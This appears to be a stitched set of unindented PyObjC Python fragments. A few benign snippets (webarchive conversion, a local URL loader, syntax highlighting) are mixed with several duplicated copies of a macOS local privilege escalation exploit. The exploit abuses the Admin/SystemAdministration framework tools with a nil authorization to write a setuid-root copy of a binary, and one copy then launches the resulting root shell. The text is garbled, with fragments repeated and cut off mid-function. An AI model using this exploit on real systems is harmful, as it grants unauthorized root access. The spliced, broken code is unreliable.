def asWebArchive(self):
"""
Convert the MHT archive to a webarchive.
"""
rootType, rootText = self.parts[self.root]
pageResource = WebResource.alloc().initWithData_URL_MIMEType_textEncodingName_frameName_(
NSData.dataWithBytes_length_(rootText.replace(b"\\", b"/"), len(rootText)),
NSURL.URLWithString_(self.fixupURL(self.root)),
NSString.stringWithString_(rootType),
None,
None)
resources = []
for url in self.parts:
if url == self.root:
continue
tp, data = self.parts[url]
resources.append(WebResource.alloc().initWithData_URL_MIMEType_textEncodingName_frameName_(
NSData.dataWithBytes_length_(data, len(data)),
NSURL.URLWithString_(self.fixupURL(url)),
NSString.stringWithString_(tp),
None,
None))
return WebArchive.alloc().initWithMainResource_subresources_subframeArchives_(
pageResource, resources, None)
def asWebArchive(self):
"""
Convert the MHT archive to a webarchive.
"""
rootType, rootText = self.parts[self.root]
pageResource = WebResource.alloc(
).initWithData_URL_MIMEType_textEncodingName_frameName_(
NSData.dataWithBytes_length_(rootText.replace(b"\\", b"/"),
len(rootText)),
NSURL.URLWithString_(self.fixupURL(self.root)),
NSString.stringWithString_(rootType),
None,
None,
)
resources = []
for url in self.parts:
if url == self.root:
continue
tp, data = self.parts[url]
resources.append(WebResource.alloc(
).initWithData_URL_MIMEType_textEncodingName_frameName_(
NSData.dataWithBytes_length_(data, len(data)),
NSURL.URLWithString_(self.fixupURL(url)),
NSString.stringWithString_(tp),
None,
None,
))
return WebArchive.alloc(
).initWithMainResource_subresources_subframeArchives_(
pageResource, resources, None)
def startLoading(self):
client = self.client()
request = self.request()
urlpath = request.URL().standardizedURL().path()
modpath = urlpath.replace("/", ".").lstrip(".").replace(".html", "")
if not PY3K:
modpath = modpath.encode("utf-8")
try:
data = gethtmldoc(modpath)
if PY3K:
data = data.encode("utf-8")
except Exception:
client.URLProtocol_didFailWithError_(
self,
NSError.errorWithDomain_code_userInfo_(
NSURLErrorDomain, NSURLErrorResourceUnavailable, None),
)
else:
response = NSURLResponse.alloc(
).initWithURL_MIMEType_expectedContentLength_textEncodingName_( # noqa: B950
request.URL(), "text/html", len(data), "utf-8")
client.URLProtocol_didReceiveResponse_cacheStoragePolicy_(
self, response, NSURLCacheStorageNotAllowed)
client.URLProtocol_didLoadData_(
self, NSData.dataWithBytes_length_(data, len(data)))
client.URLProtocolDidFinishLoading_(self)
def update(self, s):
retval = None
# find format
fmt = 'string'
if isinstance(s, NSAttributedString):
fmt = 'NSAttributedString'
elif isinstance(s, NSData):
fmt = 'rtf'
# we only do highlighting if string is supplied
if fmt == 'string':
# format the output
try:
lexer = guess_lexer(
s).__class__ if self.lexer is True else self.lexer
except pygments.util.ClassNotFound:
lexer = None
if lexer is not None:
rtf = highlight(
s,
lexer(),
RtfFormatter(
style=self.style,
fontface=self.font,
fontsize=self.fontsize *
2 # *2 as it wants half points
)).encode('utf-8')
data = NSData.dataWithBytes_length_(rtf, len(rtf))
retval = self.update(data)
else:
# fallback - the string unformatted
retval = NSAttributedString.alloc().initWithString_(s)
if self.sel is not None:
self.sel(retval)
elif fmt == 'rtf':
a = NSAttributedString.alloc().initWithRTF_documentAttributes_(
s, None)
retval = a[0]
if self.sel is not None:
self.sel(a[0])
elif fmt == 'NSAttributedString':
retval = s
if self.sel is not None:
self.sel(s)
else:
raise ValueError('unsupported format; %s' % fmt)
return retval
def verify(cls, args):
source_binary = args['options']['target']
dest_binary = os.path.realpath(args['options']['dest_binary'])
if not os.path.exists(source_binary):
raise Exception("file does not exist!")
pool = NSAutoreleasePool.alloc().init()
attr = NSMutableDictionary.alloc().init()
attr.setValue_forKey_(04777, NSFilePosixPermissions)
data = NSData.alloc().initWithContentsOfFile_(source_binary)
print "[*] will write file", dest_binary
if cls.use_old_api():
adm_lib = cls.load_lib("/Admin.framework/Admin")
Authenticator = objc.lookUpClass("Authenticator")
ToolLiaison = objc.lookUpClass("ToolLiaison")
SFAuthorization = objc.lookUpClass("SFAuthorization")
authent = Authenticator.sharedAuthenticator()
authref = SFAuthorization.authorization()
# authref with value nil is not accepted on OS X <= 10.8
authent.authenticateUsingAuthorizationSync_(authref)
st = ToolLiaison.sharedToolLiaison()
tool = st.tool()
tool.createFileWithContents_path_attributes_(
data, dest_binary, attr)
else:
adm_lib = cls.load_lib(
"/SystemAdministration.framework/SystemAdministration")
WriteConfigClient = objc.lookUpClass("WriteConfigClient")
client = WriteConfigClient.sharedClient()
client.authenticateUsingAuthorizationSync_(None)
tool = client.remoteProxy()
tool.createFileWithContents_path_attributes_(
data, dest_binary, attr, 0)
print "[+] Done!"
del pool
args['success'] = True
args['poc_ret']['dest_binary'] = dest_binary
return args
def verify(cls, args):
source_binary = args['options']['target']
dest_binary = os.path.realpath(args['options']['dest_binary'])
if not os.path.exists(source_binary):
raise Exception("file does not exist!")
pool = NSAutoreleasePool.alloc().init()
attr = NSMutableDictionary.alloc().init()
attr.setValue_forKey_(04777, NSFilePosixPermissions)
data = NSData.alloc().initWithContentsOfFile_(source_binary)
print "[*] will write file", dest_binary
if cls.use_old_api():
adm_lib = cls.load_lib("/Admin.framework/Admin")
Authenticator = objc.lookUpClass("Authenticator")
ToolLiaison = objc.lookUpClass("ToolLiaison")
SFAuthorization = objc.lookUpClass("SFAuthorization")
authent = Authenticator.sharedAuthenticator()
authref = SFAuthorization.authorization()
# authref with value nil is not accepted on OS X <= 10.8
authent.authenticateUsingAuthorizationSync_(authref)
st = ToolLiaison.sharedToolLiaison()
tool = st.tool()
tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
else:
adm_lib = cls.load_lib("/SystemAdministration.framework/SystemAdministration")
WriteConfigClient = objc.lookUpClass("WriteConfigClient")
client = WriteConfigClient.sharedClient()
client.authenticateUsingAuthorizationSync_(None)
tool = client.remoteProxy()
tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)
print "[+] Done!"
del pool
args['success'] = True
args['poc_ret']['dest_binary'] = dest_binary
return args
def startLoading(self):
client = self.client()
request = self.request()
urlpath = request.URL().standardizedURL().path()
modpath = urlpath.replace("/", "."
).lstrip("."
).replace(".html", "")
if not PY3K:
modpath = modpath.encode("utf-8")
try:
data = gethtmldoc(modpath)
if PY3K:
data = data.encode("utf-8")
except Exception as e:
client.URLProtocol_didFailWithError_(
self,
NSError.errorWithDomain_code_userInfo_(
NSURLErrorDomain,
NSURLErrorResourceUnavailable,
None,
),
)
else:
response = NSURLResponse.alloc().initWithURL_MIMEType_expectedContentLength_textEncodingName_(
request.URL(),
"text/html",
len(data),
"utf-8",
)
client.URLProtocol_didReceiveResponse_cacheStoragePolicy_(
self,
response,
NSURLCacheStorageNotAllowed,
)
client.URLProtocol_didLoadData_(
self,
NSData.dataWithBytes_length_(data, len(data)),
)
client.URLProtocolDidFinishLoading_(self)
if len(args) != 3:
print "usage: exploit.py source_binary dest_binary_as_root"
sys.exit(-1)
source_binary = args[1]
dest_binary = os.path.realpath(args[2])
if not os.path.exists(source_binary):
raise Exception("file does not exist!")
pool = NSAutoreleasePool.alloc().init()
attr = NSMutableDictionary.alloc().init()
attr.setValue_forKey_(04777, NSFilePosixPermissions)
data = NSData.alloc().initWithContentsOfFile_(source_binary)
print "will write file", dest_binary
if use_old_api():
adm_lib = load_lib("/Admin.framework/Admin")
Authenticator = objc.lookUpClass("Authenticator")
ToolLiaison = objc.lookUpClass("ToolLiaison")
SFAuthorization = objc.lookUpClass("SFAuthorization")
authent = Authenticator.sharedAuthenticator()
authref = SFAuthorization.authorization()
# authref with value nil is not accepted on OS X <= 10.8
authent.authenticateUsingAuthorizationSync_(authref)
st = ToolLiaison.sharedToolLiaison()
def run(self):
try:
source_binary = self.options.get("src_file")[1]
dest_binary = self.options.get("des_file")[1]
if source_binary == None \
or source_binary == "" \
or dest_binary == None \
or dest_binary == "":
self.print_error(
"It's mandatory to specify a source file and a destination file!!"
)
return
if not os.path.exists(source_binary):
self.print_error("File does not exist!")
return
if os.path.exists(dest_binary):
self.print_error(
"Destination file already exists. Use another name or remove/rename the original file!"
)
return
pool = NSAutoreleasePool.alloc().init()
attr = NSMutableDictionary.alloc().init()
attr.setValue_forKey_(0o04777, NSFilePosixPermissions)
data = NSData.alloc().initWithContentsOfFile_(source_binary)
self.print_info("will write file " + dest_binary)
if self.use_old_api():
adm_lib = self.load_lib("/Admin.framework/Admin")
Authenticator = objc.lookUpClass("Authenticator")
ToolLiaison = objc.lookUpClass("ToolLiaison")
SFAuthorization = objc.lookUpClass("SFAuthorization")
authent = Authenticator.sharedAuthenticator()
authref = SFAuthorization.authorization()
# authref with value nil is not accepted on OS X <= 10.8
authent.authenticateUsingAuthorizationSync_(authref)
st = ToolLiaison.sharedToolLiaison()
tool = st.tool()
tool.createFileWithContents_path_attributes_(
data, dest_binary, attr)
else:
adm_lib = self.load_lib(
"/SystemAdministration.framework/SystemAdministration")
WriteConfigClient = objc.lookUpClass("WriteConfigClient")
client = WriteConfigClient.sharedClient()
client.authenticateUsingAuthorizationSync_(None)
tool = client.remoteProxy()
tool.createFileWithContents_path_attributes_(
data, dest_binary, attr, 0)
self.print_ok("Done!")
del pool
while not os.path.exists(dest_binary):
self.print_info("Waiting file creation...")
time.sleep(1)
self.print_ok("Returning root whell at: " + dest_binary)
subprocess.call(dest_binary)
except OSError as e:
if e.errno == os.errno.ENOENT:
print("Sorry, iSelect binary - Not found!")
else:
print("Error executing exploit")
raise
if len(args) != 3:
print "usage: exploit.py source_binary dest_binary_as_root"
sys.exit(-1)
source_binary = args[1]
dest_binary = os.path.realpath(args[2])
if not os.path.exists(source_binary):
raise Exception("file does not exist!")
pool = NSAutoreleasePool.alloc().init()
attr = NSMutableDictionary.alloc().init()
attr.setValue_forKey_(04777, NSFilePosixPermissions)
data = NSData.alloc().initWithContentsOfFile_(source_binary)
print "will write file", dest_binary
if use_old_api():
adm_lib = load_lib("/Admin.framework/Admin")
Authenticator = objc.lookUpClass("Authenticator")
ToolLiaison = objc.lookUpClass("ToolLiaison")
SFAuthorization = objc.lookUpClass("SFAuthorization")
authent = Authenticator.sharedAuthenticator()
authref = SFAuthorization.authorization()
# authref with value nil is not accepted on OS X <= 10.8
authent.authenticateUsingAuthorizationSync_(authref)
st = ToolLiaison.sharedToolLiaison()
